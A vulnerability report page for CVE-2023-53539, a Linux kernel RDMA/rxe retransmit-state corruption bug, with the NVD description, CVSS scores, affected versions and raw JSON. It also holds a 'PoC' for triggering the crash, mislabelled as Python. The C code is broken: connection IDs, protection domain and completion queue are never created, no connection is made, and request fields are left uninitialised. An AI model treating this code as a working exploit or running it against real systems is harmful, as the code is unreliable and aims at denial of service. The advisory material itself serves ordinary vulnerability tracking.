Security Vulnerability Report
中文
CVE-2023-53539 CVSS 5.5 MEDIUM

CVE-2023-53539

Published: 2025-10-04 16:15:49
Last Modified: 2026-03-21 00:25:38
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix incomplete state save in rxe_requester If a send packet is dropped by the IP layer in rxe_requester() the call to rxe_xmit_packet() can fail with err == -EAGAIN. To recover, the state of the wqe is restored to the state before the packet was sent so it can be resent. However, the routines that save and restore the state miss a significnt part of the variable state in the wqe, the dma struct which is used to process through the sge table. And, the state is not saved before the packet is built which modifies the dma struct. Under heavy stress testing with many QPs on a fast node sending large messages to a slow node dropped packets are observed and the resent packets are corrupted because the dma struct was not restored. This patch fixes this behavior and allows the test cases to succeed.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:4.8:rc7:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (受rxe_requester状态保存缺陷影响的所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53539 PoC - Trigger corrupted retransmit in RDMA/rxe // This PoC demonstrates how to trigger the vulnerability by creating // multiple QPs and sending large messages to stress the rxe_requester #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <rdma/rdma_cma.h> #include <rdma/rdma_verbs.h> #include <infiniband/verbs.h> #define NUM_QPS 64 #define MSG_SIZE (1024 * 1024) // 1MB large messages #define SERVER_ADDR "192.168.1.100" #define PORT 4791 struct rdma_resources { struct rdma_cm_id *cm_id; struct ibv_pd *pd; struct ibv_cq *cq; struct ibv_qp *qp; struct ibv_mr *mr; void *buf; }; // Setup RDMA connection static int setup_qp(struct rdma_resources *res) { struct rdma_cm_event *event; struct rdma_conn_param conn_param = {}; // Create event channel struct rdma_event_channel *ec = rdma_create_event_channel(); if (!ec) return -1; // Resolve address struct addrinfo *addr; getaddrinfo(SERVER_ADDR, NULL, NULL, &addr); struct sockaddr_in *sin = (struct sockaddr_in *)addr->ai_addr; sin->sin_port = htons(PORT); rdma_resolve_addr(res->cm_id, NULL, (struct sockaddr *)sin, 2000); rdma_get_cm_event(ec, &event); rdma_ack_cm_event(event); // Create QP struct ibv_qp_init_attr qp_attr = {}; qp_attr.qp_type = IBV_QPT_RC; qp_attr.send_cq = res->cq; qp_attr.recv_cq = res->cq; qp_attr.cap.max_send_wr = 10; qp_attr.cap.max_recv_wr = 10; qp_attr.cap.max_send_sge = 1; qp_attr.cap.max_recv_sge = 1; rdma_create_qp(res->cm_id, res->pd, &qp_attr); res->qp = res->cm_id->qp; // Register memory region res->buf = malloc(MSG_SIZE); memset(res->buf, 'A', MSG_SIZE); res->mr = rdma_reg_msgs(res->cm_id, res->buf, MSG_SIZE); return 0; } // Send large message to trigger packet drop and retransmit static void stress_send(struct rdma_resources *res) { struct ibv_sge sge; struct ibv_send_wr wr, *bad_wr; sge.addr = (uint64_t)res->buf; sge.length = MSG_SIZE; sge.lkey = res->mr->lkey; wr.sg_list = &sge; wr.num_sge = 1; wr.opcode = IBV_WR_SEND; wr.send_flags = IBV_SEND_SIGNALED; wr.next = NULL; // Send large message - may trigger IP layer drop ibv_post_send(res->qp, &wr, &bad_wr); } int main(int argc, char **argv) { struct rdma_resources res[NUM_QPS]; printf("CVE-2023-53539 PoC - RDMA/rxe state corruption\n"); printf("Creating %d QPs and sending large messages...\n", NUM_QPS); // Setup multiple QPs to stress the rxe_requester for (int i = 0; i < NUM_QPS; i++) { if (setup_qp(&res[i]) < 0) { fprintf(stderr, "Failed to setup QP %d\n", i); continue; } // Send large messages concurrently stress_send(&res[i]); } printf("Stress test initiated. Check for corrupted retransmits.\n"); sleep(30); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53539", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.930", "lastModified": "2026-03-21T00:25:38.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix incomplete state save in rxe_requester\n\nIf a send packet is dropped by the IP layer in rxe_requester()\nthe call to rxe_xmit_packet() can fail with err == -EAGAIN.\nTo recover, the state of the wqe is restored to the state before\nthe packet was sent so it can be resent. However, the routines\nthat save and restore the state miss a significnt part of the\nvariable state in the wqe, the dma struct which is used to process\nthrough the sge table. And, the state is not saved before the packet\nis built which modifies the dma struct.\n\nUnder heavy stress testing with many QPs on a fast node sending\nlarge messages to a slow node dropped packets are observed and\nthe resent packets are corrupted because the dma struct was not\nrestored. This patch fixes this behavior and allows the test cases\nto succeed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8.1", "versionEndExcluding": "6.1.53", "matchCriteriaId": "E003B51F-578A-4752-8266-469759075467"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.16", "matchCriteriaId": "C3039EA3-F6CA-43EF-9F17-81A7EC6841EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5", "versionEndExcluding": "6.5.3", "matchCriteriaId": "880C803A-BEAE-4DA0-8A59-AC023F7B4EE3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:*", "matchCriteriaId": "2F396E56-2772-41B8-917F-0C38C2C1641C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.8:rc7:*:*:*:*:*:*", "matchCriteriaId": "EA3C1AC7-9D6A-4C5D-8EC9-6F634224E889"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.8:rc8:*:*:*:*:*:*", "matchCriteriaId": "3FCA9337-C4BE-41FA-841D-80FE81643EE2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/255c0e60e1d16874fc151358d94bc8df661600dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2f2a6422287fe29f9343247d77b645100ece0652", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d122db2ff80cd2aed4dcd630befb56b51ddf947", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/70518f3aaf5a059b691867d7d2d46b999319656a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.